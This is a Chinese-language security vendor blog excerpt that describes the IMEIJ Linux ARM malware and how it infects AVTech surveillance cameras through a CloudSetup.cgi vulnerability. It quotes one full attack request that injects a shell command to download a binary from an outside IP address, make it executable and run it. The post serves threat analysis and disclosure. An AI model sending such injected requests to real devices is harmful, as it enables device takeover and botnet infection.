長久以來，Linux 一直是企業平台與物聯網（IoT ,Internet of Thing）裝置製造商所偏愛的作業系統。許多不同產業都紛紛採用以 Linux 為基礎的裝置來建置智慧型系統，並利用物聯網 (IoT) 閘道來建立各種業務所需的連網解決方案及服務。然而隨著這類裝置不斷普及，針對 Linux 系統的資安威脅也跟著增加。先前在 2016 年我們即討論過一系列的 Linux 威脅，其中最知名的莫過於 Mirai 惡意程式 (趨勢科技命名為 ELF_MIRAI)。

最近又出現了一個新的 Linux ARM 惡意程式叫做 IMEIJ (趨勢科技命名為 ELF_IMEIJ.A)。此威脅專門攻擊 AVTech (陞泰科技) 監視攝影裝置的漏洞。此漏洞是由匈牙利的資安研究機構 Search-Lab 所發現，並且在 2016 年 10 月公開揭露。不過在此之前，Search-Lab 曾多次試圖聯絡 AVTech 卻未獲回應。

感染流程及類似惡意程式

此惡意程式是經由 CGI 指令感染。遠端駭客會隨機挑選一個 IP 位址然後向該位址發送以下網站指令來攻擊此漏洞：

POST /cgi-bin/supervisor/CloudSetup.cgi?exefile=wget -O /tmp/Arm1 https://192.154.108.2:8080/Arm1;chmod 0777 /tmp/Arm1;/tmp/Arm1; HTTP/1.1

更精確一點，它是利用 AVTech 裝置上的 CloudSetup.cgi 程式漏洞將惡意程式下載到裝置上，前述網站指令會讓裝置下載惡意檔案，並且將檔案設定成可執行檔。

圖 1：IMEIJ 的感染流程。 繼續閱讀